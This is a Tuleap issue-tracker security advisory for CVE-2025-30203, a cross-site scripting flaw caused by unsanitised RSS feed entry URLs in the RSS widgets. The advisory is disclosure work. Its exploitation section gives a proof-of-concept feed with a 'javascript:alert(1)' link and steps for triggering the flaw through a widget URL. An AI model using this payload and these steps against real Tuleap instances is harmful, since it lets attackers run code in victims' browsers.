Tuleap Community Edition development and releases are no longer public. You have until September 30th to download packages and sources in Tuleap project. You can contact the team if you need further assistance.

    •  
      request #42243 XSS via the content of RSS feeds in the RSS widgets
    Infos
    #42243
    Thomas Gerbet (tgerbet)
    2025-03-31 10:17
    2025-03-20 15:01
    43988
    Details
    XSS via the content of RSS feeds in the RSS widgets

    The URLs of the entries of the feed are not sanitized before being rendered.

    Impact

    A project administrator or someone with control over an used RSS feed could use this vulnerability to force victims to execute uncontrolled code.

    CVSSv3.1 score: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:L)

    Exploitation

    1. Have an RSS feed somewhere with the following content:
    <?xml version='1.0' encoding='UTF-8'?>
    <rss version="2.0" nsmap="{'atom': 'http://www.w3.org/2005/Atom', 'content': 'http://purl.org/rss/1.0/modules/content/'}">
        <channel>
            <title>XSS Feed</title>
            <docs>http://www.rssboard.org/rss-specification</docs>
            <item>
                <title>XSS Link</title>
                <link>javascript:alert(1)</link>
                <description>Desc</description>
            </item>
    </channel>
    </rss>
    
    1. Create a RSS widget linking to it
    2. Access directly to widget content (issue cannot be triggered in the dashboard page), via https://tuleap.example.com/widgets/?dashboard_id=<dashboard_id>&action=ajax&name%5B<myrss || projectrss>%5D=<widget_id> (replace the item between < and > with the appropriate values)

    References

    CWE 84
    OWASP Cross-site Scripting
    CVE-2025-30203

    Other
    All
    Empty
    • [ ] enhancement
    • [ ] internal improvement
    Empty
    Stage
    Thomas Gerbet (tgerbet)
    Closed
    2025-03-21
    Attachments
    Empty
    References
    Referencing request #42243
    Referenced by request #42243

    Follow-ups

    User avatar
    Thomas Gerbet (tgerbet)2025-03-27 17:37

    CVE-2025-30203 has been assigned to this issue.


    • Original Submission
      Something went wrong, the follow up content couldn't be loaded
      Only formatting have been changed, you should switch to markup to see the changes